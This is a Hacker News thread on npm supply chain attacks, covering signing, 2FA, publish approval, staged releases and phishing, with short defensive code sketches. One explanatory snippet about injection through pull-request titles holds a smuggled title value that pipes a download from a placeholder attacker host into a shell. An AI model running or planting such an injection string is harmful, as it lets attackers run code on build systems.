| ▲ | 0xbadcafebee 4 days ago |
| Here we are again. 12 days ago (https://news.ycombinator.com/item?id=45039764) I commented on how a similar compromise of Nx was totally preventable. Again, this is not the failure of a single person. This is a failure of the software industry. Supply chain attacks have gigantic impacts, yet these are all solved problems. Somebody just has to implement the standard security measures that prevent these compromises. We're software developers... we're the ones to implement them. Every software packaging platform on the planet should already require code signing, artifact signing, heuristics to detect attacker access to user accounts, 2FA, etc. If they don't, it's not because they can't, it's because nobody has forced them to. These attacks will not stop. With AI (and continuous proof that they work) they will only get worse. Mandate software building codes now. |
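To make "artifact signing" concrete, here's a minimal sketch of what a registry-side check could look like, assuming the registry keeps an Ed25519 public key on file per maintainer (the function and file layout are invented for illustration):

    import { verify } from "node:crypto";
    import { readFileSync } from "node:fs";

    // Returns true iff sigPath holds a valid Ed25519 signature over the tarball
    // bytes, made with the maintainer key the registry has on file. A compromised
    // registry account alone can't forge this without the offline signing key.
    function verifyArtifact(
      tarballPath: string,
      sigPath: string,
      maintainerPublicKeyPem: string,
    ): boolean {
      return verify(null, readFileSync(tarballPath), maintainerPublicKeyPem, readFileSync(sigPath));
    }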
|
| ▲ | TheJoeMan 4 days ago | parent | next [-] |
| For a package with thousands of downloads a week, does the publishing pace really need to be so fast? A new version could be uploaded to NPM, then a notification email sent to the maintainer saying it will go live on XX date, with a link to cancel. |
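A rough sketch of how that hold-and-cancel window could work (the names, the 72-hour hold, and the email step are all invented for illustration, not npm's API):

    import { randomUUID } from "node:crypto";

    interface PendingRelease {
      pkg: string;
      version: string;
      goLiveAt: Date;       // upload time + hold window
      cancelToken: string;  // single-use token embedded in the notification email
      cancelled: boolean;
    }

    const HOLD_MS = 72 * 60 * 60 * 1000; // 72-hour hold, an arbitrary policy choice

    function queueRelease(pkg: string, version: string): PendingRelease {
      const release: PendingRelease = {
        pkg,
        version,
        goLiveAt: new Date(Date.now() + HOLD_MS),
        cancelToken: randomUUID(),
        cancelled: false,
      };
      // hypothetical: emailMaintainer(pkg, release.goLiveAt, release.cancelToken)
      return release;
    }

    function shouldGoLive(r: PendingRelease, now = new Date()): boolean {
      return !r.cancelled && now >= r.goLiveAt;
    }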
| |
| ▲ | 0xbadcafebee 4 days ago | parent [-] | | A standard release process for Linux distro packages is 1) submitting a new revision, 2) having it approved by a repository maintainer, 3) letting it cook for a while in unstable, 4) then in testing, until finally 5) it is released as stable. So there's an approval process, a testing phase, and finally a release. And since it's impossible to upload a brand-new package into the repository without going through this process, typosquatting basically never happens. Sadly, programming-language package managers have normalized the idea that everyone who uses the package manager should be exposed to every random package and release from random strangers with no moderation. This would be unthinkable for a Linux distribution. (You can of course add 3rd-party Linux package repositories, unstable release branches, etc., which should enforce the same type of rules, but they don't have to.) Linux distros are still vulnerable to supply chain attacks, though. It's very rare, but it has happened. So regardless of the release process, you need all the other mitigations to secure the supply chain. And once they're set up, it's all pretty automatic and easy (I use them all day at work). | | |
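A toy model of that staging pipeline (the stage names are Debian's; the soak times and single-approval gate are simplifications made up for illustration):

    type Stage = "submitted" | "unstable" | "testing" | "stable";

    interface Pkg {
      name: string;
      stage: Stage;
      enteredStageAt: Date;
      approvedByMaintainer: boolean;
    }

    const MIN_DAYS = { unstable: 10, testing: 5 }; // arbitrary soak times

    // Returns the stage the package should move to, given where it is now.
    function promote(pkg: Pkg, now: Date): Stage {
      const daysInStage = (now.getTime() - pkg.enteredStageAt.getTime()) / 86_400_000;
      switch (pkg.stage) {
        case "submitted": // the human gate comes first
          return pkg.approvedByMaintainer ? "unstable" : "submitted";
        case "unstable":
          return daysInStage >= MIN_DAYS.unstable ? "testing" : "unstable";
        case "testing":
          return daysInStage >= MIN_DAYS.testing ? "stable" : "testing";
        case "stable":
          return "stable";
      }
    }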
| ▲ | bbarnett 3 days ago | parent | next [-] | | It's a problem solved decades ago, as you say. Devs, not caring about security or trust, just found it inconvenient. This will probably be reined in soon. Many companies I know are backing away from npm/node, and even composer. It's just too risky an ecosystem. | |
| ▲ | papyrus9244 3 days ago | parent | prev [-] | | And for any Arch users reading this, AUR is the wild west too. |
|
|
|
| ▲ | const_cast 4 days ago | parent | prev | next [-] |
| A lot of these security measures have trade-offs, particularly when we start looking at heuristics or attestation-like controls. These can exclude a lot of common systems and software, including automations. If your heuristic is as naive as "is using Linux" or "is using Firefox" or "has an IP not in the US", you run into huge issues. These sound stupid, because they are, but they're actually pretty common across a lot of software. Similar thing with 2FA. SMS isn't very secure, email primes you for phishing, and TOTP is good... but it needs to be an open standard, otherwise we're just doing the "exclude users" thing again. TOTP is still phishable, though. Only hardware-backed, phishing-resistant methods like FIDO2/WebAuthn keys aren't, but mandating those is a huge red flag and I don't think NPM could do that. |
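For reference, TOTP is an open standard (RFC 6238, with the truncation step from RFC 4226); here's a minimal sketch on top of Node's crypto. Note that nothing in it is phishing-resistant, which is exactly the point above:

    import { createHmac } from "node:crypto";

    // Generates a TOTP code from a shared secret, per RFC 6238.
    function totp(secret: Buffer, now = Date.now(), stepSeconds = 30, digits = 6): string {
      const counter = Math.floor(now / 1000 / stepSeconds); // time-based counter
      const msg = Buffer.alloc(8);
      msg.writeBigUInt64BE(BigInt(counter));
      const hmac = createHmac("sha1", secret).update(msg).digest();
      const offset = hmac[hmac.length - 1] & 0x0f;          // dynamic truncation (RFC 4226)
      const code = (hmac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
      return String(code).padStart(digits, "0");
    }

A phishing proxy defeats this because the code is just a number the user can be tricked into typing anywhere; WebAuthn resists it because the signature is bound to the site's origin.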
| |
| ▲ | rtpg 4 days ago | parent [-] | | I have a hard time arguing that 2FA isn't a massive win in almost every circumstance. Having a "confirm that you have uploaded a new package" step as the default seems good! npm requiring a human being to press a button behind a captcha for any package downloaded more than X times per week feels almost mandatory at this point. The attacks are still possible, but they won't be nearly as easy. | | |
| ▲ | SchemaLoad 3 days ago | parent [-] | | 2FA is a huge benefit over plain passwords, but it wasn't enough here. The package dev had 2FA and it didn't help, since they were tricked into logging in to a phishing page which proxied the 2FA code to the real login page. | | |
| ▲ | bbarnett 3 days ago | parent [-] | | Yet the parent suggested a confirmation for each upload, prior to publish. This attack would 100% have been thwarted when a load of emails appeared asking "publish the package you just uploaded?". (If you read the dev's account of this, you'll see this would have worked.) | | |
| ▲ | mnahkies 3 days ago | parent | next [-] | | Another advantage of this would be for CI/CD, where MFA can be a pain. If I could have a publish token / OIDC auth in CI that required an additional manual approval in the web UI before anything was actually published, I could imagine this working well. It would help reduce risk from CI system breaches as well. There are already "package published" notification emails; it's just that by that point it's too late. | | |
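Something like this hypothetical client flow (none of these endpoints exist in the real npm registry) is what's being described: CI stages the release, then blocks until a human approves it in a browser:

    // All endpoint paths and the response shape are invented for illustration.
    async function publishWithApproval(registry: string, tarball: Buffer, token: string) {
      // Stage the release; the token is allowed to do this, but not to publish.
      const staged = await fetch(`${registry}/-/staged-publish`, {
        method: "POST",
        headers: { authorization: `Bearer ${token}` },
        body: tarball,
      }).then(r => r.json());

      // CI blocks here; the maintainer gets a link and approves or rejects in the web UI.
      for (;;) {
        const { status } = await fetch(`${registry}/-/staged-publish/${staged.id}`).then(r => r.json());
        if (status === "approved") return;
        if (status === "rejected") throw new Error("release rejected in web UI");
        await new Promise(res => setTimeout(res, 30_000)); // poll every 30s
      }
    }

The design point is that a stolen CI token can only stage, never ship, so a CI breach degrades into a noisy approval request instead of a silent compromise.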
| ▲ | const_cast 3 days ago | parent [-] | | Yes, exactly. A lot of these 2FA or attestation schemes break automation, which is really undesirable in this particular scenario. It's tricky. |
| |
| ▲ | hvb2 3 days ago | parent | prev [-] | | Assuming you've compromised said developer's account, wouldn't you be able to click that publish button too? |
|
|
|
|
|
| ▲ | ropable 3 days ago | parent | prev | next [-] |
| > Somebody just has to implement the standard security measures that prevent these compromises. I don't disagree, but this sentence is doing a lot of heavy lifting. See also "draw the rest of the owl". |
| |
| ▲ | sussmannbaka 3 days ago | parent | next [-] | | We are engineers. Much like an artist could draw the rest of the owl, it’s not an unreasonable ask of a field that each day seems to grow more accustomed to learned helplessness. | |
| ▲ | giveita 3 days ago | parent | prev [-] | | Part of the owl can be how consumers upgrade: don't grab the latest patches immediately, but do keep things up to date. Secondary sources of information could tell you which versions are good to upgrade to, and when. That allows time for vulns like this one to be discovered before you upgrade. The assumption is that vulns can be detected before the mass of people install, which I think is true. Then you just need exceptions for critical security fixes. |
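A sketch of that quarantine-window idea, checking a dependency's age against the npm registry's time metadata (the `time` field is real registry data; the 14-day window is an arbitrary policy choice):

    const MIN_AGE_DAYS = 14; // arbitrary quarantine window

    // Returns true if the given version has been public long enough to trust.
    async function isOldEnough(pkg: string, version: string): Promise<boolean> {
      const meta = await fetch(`https://registry.npmjs.org/${pkg}`).then(r => r.json());
      const publishedAt = meta.time?.[version];
      if (!publishedAt) return false; // unknown version: fail closed
      const ageDays = (Date.now() - new Date(publishedAt).getTime()) / 86_400_000;
      return ageDays >= MIN_AGE_DAYS;
    }

Run against yesterday's compromised releases, a check like this would have refused them outright, while a separate allowlist could fast-track critical security fixes.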
|
|
| ▲ | imiric 4 days ago | parent | prev | next [-] |
| > Somebody just has to implement the standard security measures that prevent these compromises. It's not that simple. You can implement the most stringent security measures, and ultimately a human error will compromise the system. A perfectly secure system doesn't exist, because humans are the weakest link. So while we can probably improve some of the processes within npm, phishing attacks like the ones used in this case will always be a vulnerability. You're right that AI tools will make these attacks more common; that phishing email was indistinguishable from the real thing. But AI tools can also be used to scan for and detect such sophisticated attacks. We can't expect to fight bad actors who have superhuman tools at their disposal without using superhuman tools ourselves. Fighting fire with fire is the only reasonable strategy. |
|
| ▲ | zestyping 3 days ago | parent | prev | next [-] |
| Interesting. According to https://www.wiz.io/blog/s1ngularity-supply-chain-attack the initial entry point was a "flawed GitHub Actions workflow that allowed code injection through unsanitized pull request titles" — which was detected and mitigated on August 29. That was more than ten days ago, and yet major packages were compromised yesterday. How? |
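For anyone unfamiliar with that bug class: here's the same flaw in miniature, in TypeScript rather than the actual workflow YAML (the payload string is invented; this mirrors the pattern, not the Nx repository's exact code):

    import { execFileSync } from "node:child_process";

    // Attacker-controlled text, e.g. a pull request title:
    const prTitle = 'innocent"; curl https://evil.example | sh #';

    // Vulnerable pattern: interpolating untrusted text into a shell command.
    // execSync(`echo "PR: ${prTitle}"`); // the title escapes the quotes and runs code

    // Safer pattern: pass untrusted data as an argument, bypassing shell parsing entirely.
    execFileSync("echo", [`PR: ${prTitle}`], { stdio: "inherit" });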
|
| ▲ | ivape 4 days ago | parent | prev [-] |
| People focus on attacking Windows because there are more Windows users. What if I told you the world now has a lot more people programming in JavaScript and Python? You’re right, this will only get a lot worse. |